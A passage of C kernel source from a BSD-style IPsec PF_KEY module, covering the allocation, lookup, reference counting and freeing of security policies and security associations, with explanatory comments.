secashead *, int *, const char*, int); #define KEY_NEWSAV(m, sadb, sah, e) \ key_newsav(m, sadb, sah, e, __FILE__, __LINE__) static void key_delsav (struct secasvar *); static struct secashead *key_getsah (struct secasindex *); static struct secasvar *key_checkspidup (struct secasindex *, u_int32_t); static struct secasvar *key_getsavbyspi (struct secashead *, u_int32_t); static int key_setsaval (struct secasvar *, struct mbuf *, const struct sadb_msghdr *); static int key_mature (struct secasvar *); static struct mbuf *key_setdumpsa (struct secasvar *, u_int8_t, u_int8_t, u_int32_t, u_int32_t); static struct mbuf *key_setsadbmsg (u_int8_t, u_int16_t, u_int8_t, u_int32_t, pid_t, u_int16_t); static struct mbuf *key_setsadbsa (struct secasvar *); static struct mbuf *key_setsadbaddr (u_int16_t, const struct sockaddr *, u_int8_t, u_int16_t); #if 0 static struct mbuf *key_setsadbident (u_int16_t, u_int16_t, caddr_t, int, u_int64_t); #endif static struct mbuf *key_setsadbxsa2 (u_int8_t, u_int32_t, u_int32_t); static struct mbuf *key_setsadbxpolicy (u_int16_t, u_int8_t, u_int32_t); static void *key_newbuf (const void *, u_int); #ifdef INET6 static int key_ismyaddr6 (struct sockaddr_in6 *); #endif /* flags for key_cmpsaidx() */ #define CMP_HEAD 1 /* protocol, addresses. */ #define CMP_MODE_REQID 2 /* additionally HEAD, reqid, mode. */ #define CMP_REQID 3 /* additionally HEAD, reaid. */ #define CMP_EXACTLY 4 /* all elements. 
*/ static int key_cmpsaidx (const struct secasindex *, const struct secasindex *, int); static int key_cmpspidx_exactly (struct secpolicyindex *, struct secpolicyindex *); static int key_cmpspidx_withmask (struct secpolicyindex *, struct secpolicyindex *); static int key_sockaddrcmp (const struct sockaddr *, const struct sockaddr *, int); static int key_bbcmp (const void *, const void *, u_int); static void key_srandom (void); static u_int16_t key_satype2proto (u_int8_t); static u_int8_t key_proto2satype (u_int16_t); static int key_getspi (struct socket *, struct mbuf *, const struct sadb_msghdr *); static u_int32_t key_do_getnewspi (struct sadb_spirange *, struct secasindex *); static int key_update (struct socket *, struct mbuf *, const struct sadb_msghdr *); #ifdef IPSEC_DOSEQCHECK static struct secasvar *key_getsavbyseq (struct secashead *, u_int32_t); #endif static int key_add (struct socket *, struct mbuf *, const struct sadb_msghdr *); static int key_setident (struct secashead *, struct mbuf *, const struct sadb_msghdr *); static struct mbuf *key_getmsgbuf_x1 (struct mbuf *, const struct sadb_msghdr *); static int key_delete (struct socket *, struct mbuf *, const struct sadb_msghdr *); static int key_get (struct socket *, struct mbuf *, const struct sadb_msghdr *); static void key_getcomb_setlifetime (struct sadb_comb *); static struct mbuf *key_getcomb_esp (void); static struct mbuf *key_getcomb_ah (void); static struct mbuf *key_getcomb_ipcomp (void); static struct mbuf *key_getprop (const struct secasindex *); static int key_acquire (const struct secasindex *, struct secpolicy *); #ifndef IPSEC_NONBLOCK_ACQUIRE static struct secacq *key_newacq (const struct secasindex *); static struct secacq *key_getacq (const struct secasindex *); static struct secacq *key_getacqbyseq (u_int32_t); #endif static struct secspacq *key_newspacq (struct secpolicyindex *); static struct secspacq *key_getspacq (struct secpolicyindex *); static int key_acquire2 (struct socket 
*, struct mbuf *, const struct sadb_msghdr *);
static int key_register (struct socket *, struct mbuf *, const struct sadb_msghdr *);
static int key_expire (struct secasvar *);
static int key_flush (struct socket *, struct mbuf *, const struct sadb_msghdr *);
static int key_dump (struct socket *, struct mbuf *, const struct sadb_msghdr *);
static int key_promisc (struct socket *, struct mbuf *, const struct sadb_msghdr *);
static int key_senderror (struct socket *, struct mbuf *, int);
static int key_validate_ext (const struct sadb_ext *, int);
static int key_align (struct mbuf *, struct sadb_msghdr *);
#if 0
static const char *key_getfqdn (void);
static const char *key_getuserfqdn (void);
#endif
static void key_sa_chgstate (struct secasvar *, u_int8_t);
static struct mbuf *key_alloc_mbuf (int);

/*
 * Reference-count helpers for SA (secasvar) and SP (secpolicy) entries.
 * The KASSERTs trap refcnt overflow on ADDREF and underflow on DELREF;
 * callers are responsible for actually destroying the object when the
 * count reaches zero (see key_freesav()/_key_freesp()).
 */
#define SA_ADDREF(p) do {						\
	(p)->refcnt++;							\
	KASSERT((p)->refcnt != 0,					\
		("SA refcnt overflow at %s:%u", __FILE__, __LINE__));	\
} while (0)
#define SA_DELREF(p) do {						\
	KASSERT((p)->refcnt > 0,					\
		("SA refcnt underflow at %s:%u", __FILE__, __LINE__));	\
	(p)->refcnt--;							\
} while (0)

#define SP_ADDREF(p) do {						\
	(p)->refcnt++;							\
	KASSERT((p)->refcnt != 0,					\
		("SP refcnt overflow at %s:%u", __FILE__, __LINE__));	\
} while (0)
#define SP_DELREF(p) do {						\
	KASSERT((p)->refcnt > 0,					\
		("SP refcnt underflow at %s:%u", __FILE__, __LINE__));	\
	(p)->refcnt--;							\
} while (0)

/*
 * Return 0 when there are known to be no SP's for the specified
 * direction.  Otherwise return 1.  This is used by IPsec code
 * to optimize performance.
 */
int
key_havesp(u_int dir)
{
	/*
	 * For any direction other than INBOUND/OUTBOUND we cannot prove
	 * the SPD is empty, so conservatively report "may have SPs" (1).
	 */
	return (dir == IPSEC_DIR_INBOUND || dir == IPSEC_DIR_OUTBOUND ?
		LIST_FIRST(&sptree[dir]) != NULL : 1);
}

/* %%% IPsec policy management */
/*
 * allocating a SP for OUTBOUND or INBOUND packet.
 * Must call key_freesp() later.
 * OUT:	NULL:	not found
 *	others:	found and return the pointer.
 */
struct secpolicy *
key_allocsp(struct secpolicyindex *spidx, u_int dir, const char* where, int tag)
{
	struct secpolicy *sp;

	KASSERT(spidx != NULL, ("key_allocsp: null spidx"));
	KASSERT(dir == IPSEC_DIR_INBOUND || dir == IPSEC_DIR_OUTBOUND,
		("key_allocsp: invalid direction %u", dir));

	KEYDEBUG(KEYDEBUG_IPSEC_STAMP,
		kprintf("DP key_allocsp from %s:%u\n", where, tag));

	/* get a SP entry */
	/*
	 * Linear scan of the per-direction SPD under a critical section;
	 * DEAD entries are skipped, first mask-match wins (list order is
	 * therefore the policy priority order).
	 */
	crit_enter();
	KEYDEBUG(KEYDEBUG_IPSEC_DATA,
		kprintf("*** objects\n");
		kdebug_secpolicyindex(spidx));

	LIST_FOREACH(sp, &sptree[dir], chain) {
		KEYDEBUG(KEYDEBUG_IPSEC_DATA,
			kprintf("*** in SPD\n");
			kdebug_secpolicyindex(&sp->spidx));

		if (sp->state == IPSEC_SPSTATE_DEAD)
			continue;
		if (key_cmpspidx_withmask(&sp->spidx, spidx))
			goto found;
	}
	sp = NULL;
found:
	if (sp) {
		/* sanity check */
		KEY_CHKSPDIR(sp->spidx.dir, dir, "key_allocsp");

		/* found a SPD entry */
		/* Caller owns a reference; it must be dropped via key_freesp(). */
		sp->lastused = time_second;
		SP_ADDREF(sp);
	}
	crit_exit();

	KEYDEBUG(KEYDEBUG_IPSEC_STAMP,
		kprintf("DP key_allocsp return SP:%p (ID=%u) refcnt %u\n",
			sp, sp ? sp->id : 0, sp ? sp->refcnt : 0));
	return sp;
}

/*
 * allocating a SP for OUTBOUND or INBOUND packet.
 * Must call key_freesp() later.
 * OUT:	NULL:	not found
 *	others:	found and return the pointer.
 */
struct secpolicy *
key_allocsp2(u_int32_t spi, union sockaddr_union *dst, u_int8_t proto,
	     u_int dir, const char* where, int tag)
{
	struct secpolicy *sp;

	KASSERT(dst != NULL, ("key_allocsp2: null dst"));
	KASSERT(dir == IPSEC_DIR_INBOUND || dir == IPSEC_DIR_OUTBOUND,
		("key_allocsp2: invalid direction %u", dir));

	KEYDEBUG(KEYDEBUG_IPSEC_STAMP,
		kprintf("DP key_allocsp2 from %s:%u\n", where, tag));

	/* get a SP entry */
	/*
	 * Like key_allocsp(), but matches on (ul_proto, first request's
	 * SA spi, dst address) instead of a full policy index mask.
	 */
	crit_enter();
	KEYDEBUG(KEYDEBUG_IPSEC_DATA,
		kprintf("*** objects\n");
		kprintf("spi %u proto %u dir %u\n", spi, proto, dir);
		kdebug_sockaddr(&dst->sa));

	LIST_FOREACH(sp, &sptree[dir], chain) {
		KEYDEBUG(KEYDEBUG_IPSEC_DATA,
			kprintf("*** in SPD\n");
			kdebug_secpolicyindex(&sp->spidx));

		if (sp->state == IPSEC_SPSTATE_DEAD)
			continue;
		/* compare simple values, then dst address */
		if (sp->spidx.ul_proto != proto)
			continue;
		/* NB: spi's must exist and match */
		if (!sp->req || !sp->req->sav || sp->req->sav->spi != spi)
			continue;
		/* key_sockaddrcmp() == 0 means the addresses are equal */
		if (key_sockaddrcmp(&sp->spidx.dst.sa, &dst->sa, 1) == 0)
			goto found;
	}
	sp = NULL;
found:
	if (sp) {
		/* sanity check */
		KEY_CHKSPDIR(sp->spidx.dir, dir, "key_allocsp2");

		/* found a SPD entry */
		/* Reference is handed to the caller (drop with key_freesp()). */
		sp->lastused = time_second;
		SP_ADDREF(sp);
	}
	crit_exit();

	KEYDEBUG(KEYDEBUG_IPSEC_STAMP,
		kprintf("DP key_allocsp2 return SP:%p (ID=%u) refcnt %u\n",
			sp, sp ? sp->id : 0, sp ? sp->refcnt : 0));
	return sp;
}

/*
 * return a policy that matches this particular inbound packet.
 * XXX slow
 */
struct secpolicy *
key_gettunnel(const struct sockaddr *osrc,
	      const struct sockaddr *odst,
	      const struct sockaddr *isrc,
	      const struct sockaddr *idst,
	      const char* where, int tag)
{
	struct secpolicy *sp;
	const int dir = IPSEC_DIR_INBOUND;
	/*
	 * r2 walks the TUNNEL-mode requests of a policy; r1 trails one
	 * step behind, so (r1, r2) is a pair of consecutive tunnel
	 * requests (r1 == NULL for the innermost one).
	 */
	struct ipsecrequest *r1, *r2, *p;
	struct secpolicyindex spidx;

	KEYDEBUG(KEYDEBUG_IPSEC_STAMP,
		kprintf("DP key_gettunnel from %s:%u\n", where, tag));

	if (isrc->sa_family != idst->sa_family) {
		ipseclog((LOG_ERR, "protocol family mismatched %d != %d\n.",
			isrc->sa_family, idst->sa_family));
		sp = NULL;
		goto done;
	}

	crit_enter();
	LIST_FOREACH(sp, &sptree[dir], chain) {
		if (sp->state == IPSEC_SPSTATE_DEAD)
			continue;

		r1 = r2 = NULL;
		for (p = sp->req; p; p = p->next) {
			if (p->saidx.mode != IPSEC_MODE_TUNNEL)
				continue;

			r1 = r2;
			r2 = p;

			if (!r1) {
				/* here we look at address matches only */
				/*
				 * Innermost tunnel request: compare the inner
				 * addresses against the policy index, with the
				 * policy's masks applied.
				 */
				spidx = sp->spidx;
				if (isrc->sa_len > sizeof(spidx.src) ||
				    idst->sa_len > sizeof(spidx.dst))
					continue;
				bcopy(isrc, &spidx.src, isrc->sa_len);
				bcopy(idst, &spidx.dst, idst->sa_len);
				if (!key_cmpspidx_withmask(&sp->spidx, &spidx))
					continue;
			} else {
				if (key_sockaddrcmp(&r1->saidx.src.sa, isrc, 0) ||
				    key_sockaddrcmp(&r1->saidx.dst.sa, idst, 0))
					continue;
			}

			/* Outer endpoints must match this request's SA index. */
			if (key_sockaddrcmp(&r2->saidx.src.sa, osrc, 0) ||
			    key_sockaddrcmp(&r2->saidx.dst.sa, odst, 0))
				continue;

			goto found;
		}
	}
	sp = NULL;
found:
	if (sp) {
		/* Reference handed to caller; drop with key_freesp(). */
		sp->lastused = time_second;
		SP_ADDREF(sp);
	}
	crit_exit();
done:
	KEYDEBUG(KEYDEBUG_IPSEC_STAMP,
		kprintf("DP key_gettunnel return SP:%p (ID=%u) refcnt %u\n",
			sp, sp ? sp->id : 0, sp ? sp->refcnt : 0));
	return sp;
}

/*
 * allocating an SA entry for an *OUTBOUND* packet.
 * checking each request entries in SP, and acquire an SA if need.
 * OUT:	0: there are valid requests.
 *	ENOENT: policy may be valid, but SA with REQUIRE is on acquiring.
 */
int
key_checkrequest(struct ipsecrequest *isr, const struct secasindex *saidx)
{
	u_int level;
	int error;

	KASSERT(isr != NULL, ("key_checkrequest: null isr"));
	KASSERT(saidx != NULL, ("key_checkrequest: null saidx"));
	KASSERT(saidx->mode == IPSEC_MODE_TRANSPORT ||
		saidx->mode == IPSEC_MODE_TUNNEL,
		("key_checkrequest: unexpected policy %u", saidx->mode));

	/* get current level */
	level = ipsec_get_reqlevel(isr);

	/*
	 * XXX guard against protocol callbacks from the crypto
	 * thread as they reference ipsecrequest.sav which we
	 * temporarily null out below.  Need to rethink how we
	 * handle bundled SA's in the callback thread.
	 */
#if 0
	/*
	 * We do allocate new SA only if the state of SA in the holder is
	 * SADB_SASTATE_DEAD.  The SA for outbound must be the oldest.
	 */
	if (isr->sav != NULL) {
		if (isr->sav->sah == NULL)
			panic("key_checkrequest: sah is null.\n");
		if (isr->sav == (struct secasvar *)LIST_FIRST(
			&isr->sav->sah->savtree[SADB_SASTATE_DEAD])) {
			KEY_FREESAV(&isr->sav);
			isr->sav = NULL;
		}
	}
#else
	/*
	 * we free any SA stashed in the IPsec request because a different
	 * SA may be involved each time this request is checked, either
	 * because new SAs are being configured, or this request is
	 * associated with an unconnected datagram socket, or this request
	 * is associated with a system default policy.
	 *
	 * The operation may have negative impact to performance.  We may
	 * want to check cached SA carefully, rather than picking new SA
	 * every time.
	 */
	if (isr->sav != NULL) {
		KEY_FREESAV(&isr->sav);
		isr->sav = NULL;
	}
#endif

	/*
	 * new SA allocation if no SA found.
	 * key_allocsa_policy should allocate the oldest SA available.
	 * See key_do_allocsa_policy(), and draft-jenkins-ipsec-rekeying-03.txt.
	 */
	if (isr->sav == NULL)
		isr->sav = key_allocsa_policy(saidx);

	/* When there is SA. */
	if (isr->sav != NULL) {
		/* Only MATURE/DYING SAs are usable for output. */
		if (isr->sav->state != SADB_SASTATE_MATURE &&
		    isr->sav->state != SADB_SASTATE_DYING)
			return EINVAL;
		return 0;
	}

	/* there is no SA */
	/* Kick off IKE negotiation (SADB_ACQUIRE) for this SA index. */
	error = key_acquire(saidx, isr->sp);
	if (error != 0) {
		/* XXX What should I do ? */
		ipseclog((LOG_DEBUG, "key_checkrequest: error %d returned "
			"from key_acquire.\n", error));
		return error;
	}

	if (level != IPSEC_LEVEL_REQUIRE) {
		/* XXX sigh, the interface to this routine is botched */
		KASSERT(isr->sav == NULL, ("key_checkrequest: unexpected SA"));
		return 0;
	} else {
		/* REQUIRE level: caller must wait for the acquire to finish. */
		return ENOENT;
	}
}

/*
 * allocating a SA for policy entry from SAD.
 * NOTE: searching SAD of aliving state.
 * OUT:	NULL:	not found.
 *	others:	found and return the pointer.
 */
static struct secasvar *
key_allocsa_policy(const struct secasindex *saidx)
{
	struct secashead *sah;
	struct secasvar *sav;
	u_int stateidx, state;

	LIST_FOREACH(sah, &sahtree, chain) {
		if (sah->state == SADB_SASTATE_DEAD)
			continue;
		if (key_cmpsaidx(&sah->saidx, saidx, CMP_MODE_REQID))
			goto found;
	}

	return NULL;

found:
	/* search valid state */
	/*
	 * saorder_state_valid lists SA states in preference order;
	 * return the first SA found in the most-preferred state.
	 */
	for (stateidx = 0; stateidx < NELEM(saorder_state_valid); stateidx++) {
		state = saorder_state_valid[stateidx];
		sav = key_do_allocsa_policy(sah, state);
		if (sav != NULL)
			return sav;
	}

	return NULL;
}

/*
 * searching SAD with direction, protocol, mode and state.
 * called by key_allocsa_policy().
 * OUT:
 *	NULL	: not found
 *	others	: found, pointer to a SA.
 */
static struct secasvar *
key_do_allocsa_policy(struct secashead *sah, u_int state)
{
	struct secasvar *sav, *nextsav, *candidate = NULL, *d;

	LIST_FOREACH_MUTABLE(sav, &sah->savtree[state], chain, nextsav) {
		/* sanity check */
		KEY_CHKSASTATE(sav->state, state, "key_do_allocsa_policy");

		/* initialize */
		if (candidate == NULL) {
			candidate = sav;
			continue;
		}

		/* Which SA is the better ? */

		/* sanity check 2 */
		if (candidate->lft_c == NULL || sav->lft_c == NULL)
			panic("key_do_allocsa_policy: "
				"lifetime_current is NULL.\n");

		/* What the best method is to compare ? */
		/* key_prefered_oldsa: sysctl choosing oldest-vs-newest SA. */
		if (key_prefered_oldsa) {
			if (candidate->lft_c->sadb_lifetime_addtime >
					sav->lft_c->sadb_lifetime_addtime) {
				candidate = sav;
			}
			continue;
		}

		/* prefered new sa rather than old sa */
		if (candidate->lft_c->sadb_lifetime_addtime <
				sav->lft_c->sadb_lifetime_addtime) {
			d = candidate;
			candidate = sav;
		} else
			d = sav;

		/*
		 * prepared to delete the SA when there is more
		 * suitable candidate and the lifetime of the SA is not
		 * permanent.
		 */
		if (d->lft_c->sadb_lifetime_addtime != 0) {
			struct mbuf *m, *result;
			u_int8_t satype;

			key_sa_chgstate(d, SADB_SASTATE_DEAD);

			KASSERT(d->refcnt > 0,
				("key_do_allocsa_policy: bogus ref count"));

			satype = key_proto2satype(d->sah->saidx.proto);
			if (satype == 0)
				goto msgfail;

			/*
			 * Build and push an SADB_DELETE notification to
			 * registered PF_KEY listeners; on any mbuf failure
			 * we just skip the notification (msgfail) but the
			 * SA is still released below.
			 */
			m = key_setsadbmsg(SADB_DELETE, 0,
					satype, 0, 0, d->refcnt - 1);
			if (!m)
				goto msgfail;
			result = m;

			/* set sadb_address for saidx's. */
			m = key_setsadbaddr(SADB_EXT_ADDRESS_SRC,
				&d->sah->saidx.src.sa,
				d->sah->saidx.src.sa.sa_len << 3,
				IPSEC_ULPROTO_ANY);
			if (!m)
				goto msgfail;
			m_cat(result, m);

			/* set sadb_address for saidx's. */
			m = key_setsadbaddr(SADB_EXT_ADDRESS_DST,
				&d->sah->saidx.dst.sa,
				d->sah->saidx.dst.sa.sa_len << 3,
				IPSEC_ULPROTO_ANY);
			if (!m)
				goto msgfail;
			m_cat(result, m);

			/* create SA extension */
			m = key_setsadbsa(d);
			if (!m)
				goto msgfail;
			m_cat(result, m);

			if (result->m_len < sizeof(struct sadb_msg)) {
				result = m_pullup(result,
						sizeof(struct sadb_msg));
				if (result == NULL)
					goto msgfail;
			}
			result->m_pkthdr.len = m_lengthm(result, NULL);
			mtod(result, struct sadb_msg *)->sadb_msg_len =
				PFKEY_UNIT64(result->m_pkthdr.len);

			if (key_sendup_mbuf(NULL, result,
					KEY_SENDUP_REGISTERED))
				goto msgfail;
 msgfail:
			KEY_FREESAV(&d);
		}
	}

	if (candidate) {
		/* Caller receives a reference; release via key_freesav(). */
		SA_ADDREF(candidate);
		KEYDEBUG(KEYDEBUG_IPSEC_STAMP,
			kprintf("DP allocsa_policy cause "
				"refcnt++:%d SA:%p\n",
				candidate->refcnt, candidate));
	}
	return candidate;
}

/*
 * allocating a usable SA entry for a *INBOUND* packet.
 * Must call key_freesav() later.
 * OUT: positive:	pointer to a usable sav (i.e. MATURE or DYING state).
 *	NULL:		not found, or error occured.
 *
 * In the comparison, no source address is used--for RFC2401 conformance.
 * To quote, from section 4.1:
 *	A security association is uniquely identified by a triple consisting
 *	of a Security Parameter Index (SPI), an IP Destination Address, and a
 *	security protocol (AH or ESP) identifier.
 * Note that, however, we do need to keep source address in IPsec SA.
 * IKE specification and PF_KEY specification do assume that we
 * keep source address in IPsec SA.  We see a tricky situation here.
 */
struct secasvar *
key_allocsa(
	union sockaddr_union *dst,
	u_int proto,
	u_int32_t spi,
	const char* where, int tag)
{
	struct secashead *sah;
	struct secasvar *sav;
	u_int stateidx, state;

	KASSERT(dst != NULL, ("key_allocsa: null dst address"));

	KEYDEBUG(KEYDEBUG_IPSEC_STAMP,
		kprintf("DP key_allocsa from %s:%u\n", where, tag));

	/*
	 * searching SAD.
	 * XXX: to be checked internal IP header somewhere.  Also when
	 * IPsec tunnel packet is received.  But ESP tunnel mode is
	 * encrypted so we can't check internal IP header.
	 */
	crit_enter();
	LIST_FOREACH(sah, &sahtree, chain) {
		/* search valid state */
		/* States are probed in preference order (MATURE before DYING). */
		for (stateidx = 0;
		     stateidx < NELEM(saorder_state_valid);
		     stateidx++) {
			state = saorder_state_valid[stateidx];
			LIST_FOREACH(sav, &sah->savtree[state], chain) {
				/* sanity check */
				KEY_CHKSASTATE(sav->state, state, "key_allocsav");
				/* do not return entries w/ unusable state */
				if (sav->state != SADB_SASTATE_MATURE &&
				    sav->state != SADB_SASTATE_DYING)
					continue;
				if (proto != sav->sah->saidx.proto)
					continue;
				if (spi != sav->spi)
					continue;
#if 0	/* don't check src */
				/* check src address */
				if (key_sockaddrcmp(&src->sa,
						&sav->sah->saidx.src.sa, 0) != 0)
					continue;
#endif
				/* check dst address */
				if (key_sockaddrcmp(&dst->sa,
						&sav->sah->saidx.dst.sa, 0) != 0)
					continue;
				/* Reference handed to caller (key_freesav()). */
				SA_ADDREF(sav);
				goto done;
			}
		}
	}
	sav = NULL;
done:
	crit_exit();

	KEYDEBUG(KEYDEBUG_IPSEC_STAMP,
		kprintf("DP key_allocsa return SA:%p; refcnt %u\n",
			sav, sav ? sav->refcnt : 0));
	return sav;
}

/*
 * Must be called after calling key_allocsp().
 * For both the packet without socket and key_freeso().
 */
void
_key_freesp(struct secpolicy **spp, const char* where, int tag)
{
	struct secpolicy *sp = *spp;

	KASSERT(sp != NULL, ("key_freesp: null sp"));

	SP_DELREF(sp);
	KEYDEBUG(KEYDEBUG_IPSEC_STAMP,
		kprintf("DP key_freesp SP:%p (ID=%u) from %s:%u; refcnt now %u\n",
			sp, sp->id, where, tag, sp->refcnt));

	/* Last reference: clear caller's pointer and destroy the SP. */
	if (sp->refcnt == 0) {
		*spp = NULL;
		key_delsp(sp);
	}
}

/*
 * Must be called after calling key_allocsp().
 * For the packet with socket.
 */
void
key_freeso(struct socket *so)
{
	/* sanity check */
	KASSERT(so != NULL, ("key_freeso: null so"));

	/* Release the cached in/out SPs hanging off the socket's PCB. */
	switch (so->so_proto->pr_domain->dom_family) {
#ifdef INET
	case PF_INET:
	    {
		struct inpcb *pcb = so->so_pcb;

		/* Does it have a PCB ? */
		if (pcb == NULL)
			return;
		key_freesp_so(&pcb->inp_sp->sp_in);
		key_freesp_so(&pcb->inp_sp->sp_out);
	    }
		break;
#endif
#ifdef INET6
	case PF_INET6:
	    {
#ifdef HAVE_NRL_INPCB
		struct inpcb *pcb = so->so_pcb;

		/* Does it have a PCB ? */
		if (pcb == NULL)
			return;
		key_freesp_so(&pcb->inp_sp->sp_in);
		key_freesp_so(&pcb->inp_sp->sp_out);
#else
		struct in6pcb *pcb = so->so_pcb;

		/* Does it have a PCB ? */
		if (pcb == NULL)
			return;
		key_freesp_so(&pcb->in6p_sp->sp_in);
		key_freesp_so(&pcb->in6p_sp->sp_out);
#endif
	    }
		break;
#endif /* INET6 */
	default:
		ipseclog((LOG_DEBUG, "key_freeso: unknown address family=%d.\n",
		    so->so_proto->pr_domain->dom_family));
		return;
	}
}

static void
key_freesp_so(struct secpolicy **sp)
{
	KASSERT(sp != NULL && *sp != NULL, ("key_freesp_so: null sp"));

	/* ENTRUST/BYPASS policies are static singletons; never freed here. */
	if ((*sp)->policy == IPSEC_POLICY_ENTRUST ||
	    (*sp)->policy == IPSEC_POLICY_BYPASS)
		return;
	KASSERT((*sp)->policy == IPSEC_POLICY_IPSEC,
		("key_freesp_so: invalid policy %u", (*sp)->policy));
	KEY_FREESP(sp);
}

/*
 * Must be called after calling key_allocsa().
 * This function is called by key_freesp() to free some SA allocated
 * for a policy.
 */
void
key_freesav(struct secasvar **psav, const char* where, int tag)
{
	struct secasvar *sav = *psav;

	KASSERT(sav != NULL, ("key_freesav: null sav"));

	SA_DELREF(sav);
	KEYDEBUG(KEYDEBUG_IPSEC_STAMP,
		kprintf("DP key_freesav SA:%p (SPI %u) from %s:%u; refcnt now %u\n",
			sav, ntohl(sav->spi), where, tag, sav->refcnt));

	/* Last reference: clear caller's pointer and destroy the SA. */
	if (sav->refcnt == 0) {
		*psav = NULL;
		key_delsav(sav);
	}
}

/* %%% SPD management */
/*
 * free security policy entry.
 */
static void
key_delsp(struct secpolicy *sp)
{
	KASSERT(sp != NULL, ("key_delsp: null sp"));

	sp->state = IPSEC_SPSTATE_DEAD;

	KASSERT(sp->refcnt == 0,
		("key_delsp: SP with references deleted (refcnt %u)",
		sp->refcnt));

	crit_enter();
	/* remove from SP index */
	if (__LIST_CHAINED(sp))
		LIST_REMOVE(sp, chain);

    {
	/* Release the request chain, dropping each cached SA reference. */
	struct ipsecrequest *isr = sp->req, *nextisr;

	while (isr != NULL) {
		if (isr->sav != NULL) {
			KEY_FREESAV(&isr->sav);
			isr->sav = NULL;
		}

		nextisr = isr->next;
		KFREE(isr);
		isr = nextisr;
	}
    }

	KFREE(sp);
	crit_exit();
}

/*
 * search SPD
 * OUT:	NULL	: not found
 *	others	: found, pointer to a SP.
 */
static struct secpolicy *
key_getsp(struct secpolicyindex *spidx)
{
	struct secpolicy *sp;

	KASSERT(spidx != NULL, ("key_getsp: null spidx"));

	/* Exact-index match (no masking); returns a referenced SP. */
	LIST_FOREACH(sp, &sptree[spidx->dir], chain) {
		if (sp->state == IPSEC_SPSTATE_DEAD)
			continue;
		if (key_cmpspidx_exactly(spidx, &sp->spidx)) {
			SP_ADDREF(sp);
			return sp;
		}
	}

	return NULL;
}

/*
 * get SP by index.
 * OUT:	NULL	: not found
 *	others	: found, pointer to a SP.
 */
static struct secpolicy *
key_getspbyid(u_int32_t id)
{
	struct secpolicy *sp;

	/* Policy ids are global, so both direction lists must be probed. */
	LIST_FOREACH(sp, &sptree[IPSEC_DIR_INBOUND], chain) {
		if (sp->state == IPSEC_SPSTATE_DEAD)
			continue;
		if (sp->id == id) {
			SP_ADDREF(sp);
			return sp;
		}
	}

	LIST_FOREACH(sp, &sptree[IPSEC_DIR_OUTBOUND], chain) {
		if (sp->state == IPSEC_SPSTATE_DEAD)
			continue;
		if (sp->id == id) {
			SP_ADDREF(sp);
			return sp;
		}
	}

	return NULL;
}

struct secpolicy *
key_newsp(const char* where, int tag)
{
	struct secpolicy *newsp = NULL;

	/* M_NULLOK: allocation may fail, caller must handle NULL. */
	newsp = kmalloc(sizeof(struct secpolicy), M_SECA,
			M_INTWAIT | M_ZERO | M_NULLOK);
	if (newsp) {
		newsp->refcnt = 1;
		newsp->req = NULL;
	}

	KEYDEBUG(KEYDEBUG_IPSEC_STAMP,
		kprintf("DP key_newsp from %s:%u return SP:%p\n",
			where, tag, newsp));
	return newsp;
}

/*
 * create secpolicy structure from sadb_x_policy structure.
 * NOTE: `state', `secpolicyindex' in secpolicy structure are not set,
 * so must be set properly later.
 */
struct secpolicy *
key_msg2sp(struct sadb_x_policy *xpl0, size_t len, int *error)
{
	struct secpolicy *newsp;

	/* sanity check */
	if (xpl0 == NULL)
		panic("key_msg2sp: NULL pointer was passed.\n");
	if (len < sizeof(*xpl0))
		panic("key_msg2sp: invalid length.\n");
	if (len != PFKEY_EXTLEN(xpl0)) {
		ipseclog((LOG_DEBUG, "key_msg2sp: Invalid msg length.\n"));
		*error = EINVAL;
		return NULL;
	}

	if ((newsp = KEY_NEWSP()) == NULL) {
		*error = ENOBUFS;
		return NULL;
	}

	newsp->spidx.dir = xpl0->sadb_x_policy_dir;
	newsp->policy = xpl0->sadb_x_policy_type;

	/* check policy */
	switch (xpl0->sadb_x_policy_type) {
	case IPSEC_POLICY_DISCARD:
	case IPSEC_POLICY_NONE:
	case IPSEC_POLICY_ENTRUST:
	case IPSEC_POLICY_BYPASS:
		newsp->req = NULL;
		break;

	case IPSEC_POLICY_IPSEC:
	    {
		/*
		 * Parse the variable-length chain of sadb_x_ipsecrequest
		 * records that follows the sadb_x_policy header.  This data
		 * arrives from userland, so every length field is validated
		 * before use.
		 */
		int tlen;
		struct sadb_x_ipsecrequest *xisr;
		struct ipsecrequest **p_isr = &newsp->req;

		/* validity check */
		if (PFKEY_EXTLEN(xpl0) < sizeof(*xpl0)) {
			ipseclog((LOG_DEBUG,
			    "key_msg2sp: Invalid msg length.\n"));
			KEY_FREESP(&newsp);
			*error = EINVAL;
			return NULL;
		}

		tlen = PFKEY_EXTLEN(xpl0) - sizeof(*xpl0);
		xisr = (struct sadb_x_ipsecrequest *)(xpl0 + 1);

		while (tlen > 0) {
			/* length check */
			if (xisr->sadb_x_ipsecrequest_len < sizeof(*xisr)) {
				ipseclog((LOG_DEBUG, "key_msg2sp: "
					"invalid ipsecrequest length.\n"));
				KEY_FREESP(&newsp);
				*error = EINVAL;
				return NULL;
			}

			/* allocate request buffer */
			KMALLOC(*p_isr, struct ipsecrequest *, sizeof(**p_isr));
			if ((*p_isr) == NULL) {
				ipseclog((LOG_DEBUG,
				    "key_msg2sp: No more memory.\n"));
				KEY_FREESP(&newsp);
				*error = ENOBUFS;
				return NULL;
			}
			bzero(*p_isr, sizeof(**p_isr));

			/* set values */
			(*p_isr)->next = NULL;

			switch (xisr->sadb_x_ipsecrequest_proto) {
			case IPPROTO_ESP:
			case IPPROTO_AH:
			case IPPROTO_IPCOMP:
				break;
			default:
				ipseclog((LOG_DEBUG,
				    "key_msg2sp: invalid proto type=%u\n",
				    xisr->sadb_x_ipsecrequest_proto));
				KEY_FREESP(&newsp);
				*error = EPROTONOSUPPORT;
				return NULL;
			}
			(*p_isr)->saidx.proto = xisr->sadb_x_ipsecrequest_proto;

			switch (xisr->sadb_x_ipsecrequest_mode) {
			case IPSEC_MODE_TRANSPORT:
			case IPSEC_MODE_TUNNEL:
				break;
			case IPSEC_MODE_ANY:
			default:
				ipseclog((LOG_DEBUG,
				    "key_msg2sp: invalid mode=%u\n",
				    xisr->sadb_x_ipsecrequest_mode));
				KEY_FREESP(&newsp);
				*error = EINVAL;
				return NULL;
			}
			(*p_isr)->saidx.mode = xisr->sadb_x_ipsecrequest_mode;

			switch (xisr->sadb_x_ipsecrequest_level) {
			case IPSEC_LEVEL_DEFAULT:
			case IPSEC_LEVEL_USE:
			case IPSEC_LEVEL_REQUIRE:
				break;
			case IPSEC_LEVEL_UNIQUE:
				/* validity check */
				/*
				 * If range violation of reqid, kernel will
				 * update it, don't refuse it.
				 */
